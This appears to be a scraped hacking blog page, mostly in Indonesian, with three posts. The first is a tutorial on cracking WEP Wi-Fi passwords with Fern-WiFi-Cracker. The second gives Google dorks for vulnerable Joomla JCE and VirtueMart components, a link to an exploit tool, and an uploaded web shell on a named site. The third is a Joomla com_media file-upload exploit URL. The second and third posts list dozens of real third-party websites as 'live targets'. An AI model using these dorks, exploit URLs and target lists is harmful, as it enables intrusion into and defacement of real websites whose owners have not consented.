1 How to using Fern-WiFi-Cracker on Backtrack 5 R3

Fern-WiFi-Cracker is a Wireless Penetration Testing Tool written in python. It provides a GUI for cracking wireless networks. Fern Wi-fi cracker automatically run aireplay-ng, airodump-ng and aircrack-ng when you execute Fern-WiFi-Cracker. They are run separately but Fern-WiFi-Cracker  uses the aircrack-ng suite of tools. You can use Fern-WiFi-Cracker  for Session Hijacking or locate geolocation of a particular system based on its Mac address. Before using Fern-WiFi-Cracker make sure that your wireless card supports packet injection.

You can open Fern-WiFi-Cracker with go to
Backtrack >> Exploitation Tools >> Wireless exploitation tools >> WLAN exploitation >> Fern-WiFi-Cracker

Then select your wireless interface

Click the Wi-Fi logo button on the top and it will start the network scanning. You can set setting by double click in the application window.

After scanning you will see active button of WiFi WEP cracking or WPA cracking. Because the available of WiFi is WEP click the button

New dialog box will open. Set the setting  with select the WEP network from the list and select the type of attack. After you complete set the setting now launch the attack with click the Attack button.

Wait until the progress bar 100% complete and after it’s complete the Fern WiFi Cracker will starts aircrack for cracking wifi password.

Password will be shown in the button of window.

0 JCE Exploiter Dork List

Pertama download Dulu Softnya https://www.box.com/s/6irr9sluqkvzaon341m6
Dorknya :
inurl:"/index.php?option=com_jce"
inurl:index.php?option=com_virtuemart

Kemudia cari target http://www.kazan.monarh.su/ Ane pilih ini
tru site di dalam kolom soft seperti ini :

 

Click this bar to view the full image.

 

kemudian Klik start ini hasil exploitnya:


 

Click this bar to view the full image.

 

http://www.kazan.monarh.su/images/stories/3xp.php
Oke gitu aja
 
Live target :
http://thiennguyen.vn/
http://yomeapunto.com/
http://monarh.su/
http://volga.monarh.su/
http://thonliab.promic.ac.th/

I
Part 3


Dork List New
inurl:joomla/index.php?option=com_virtuemart
inurl:uk/index.php?option=com_virtuemart
inurl:"joomla/index.php?option=com_jce"
tambahan tools 

 
[url=http://www.facebook.com/download/101489716725975/JCE%20New%20Update%20by%20no-c0de.rar]

0 Exploit Title: Com_Media (CMS JOOMLA)

# Exploit Title: Com_Media (CMS JOOMLA)
# Date: 12-05-2013
# Author: SultanHaikal
# Version: 2.5
# Tested on: Windows Xp & Linux 
# My Friend: Hmei7 - Black Angels - Netter - Panda07.
# Dork: inurl:com_media dan site:.com inurl:com_media kembangin lagi bro :P jangan mau enaknya aja

Pertama Serach google dork nya :D
Biar ga susah" gua kasih live target nya aja deh :D
www.ayrshirebridge.co.uk
www.magicrete.in 
www.unitedwaypeel.org
www.cvbhejo.com
rockbandschoolofmusic.com
www.adriennejfurness.com
www.one-world-volunteer.net
hiddenneedle.com
www.wartakutim.com
permaculture.com.au/campus
arsomsilp.ac.th/health
www.skylinepark.org
www.gorillareisen.de
www.moclinejo.de
www.sv-mistelgau.de
www.ablogic.de

dan masih banyak lagi bro neh langsung aja ke TKP :

www.ayrshirebridge.co.uk 
nah gua pake live target web yang di atas ini coba lu tambahiin ini 
/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
jadi seperti ini  

http://www.ayrshirebridge.co.uk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
ss:



Click Browse neh ini vuln nya file berbentuk : .txt .jpg .gif .png kalo .php dan html kayanya ngga work bro :D tapi misalnnya agan" bisa ya bagus lah di kembangin

jika bro sudah click browse nah pilih lah file anda :D contoh ss :)





nah saya browse file saya yang berbentuk .txt bernama x.txt 
lalu lu click Start upload tunggu sebentar dan selesai.

Jika ingin mengecek file kita tinggal tambahkan /images/filekita.txt 

done http://www.ayrshirebridge.co.uk/images/x.txt 

Sumber : Komandanseo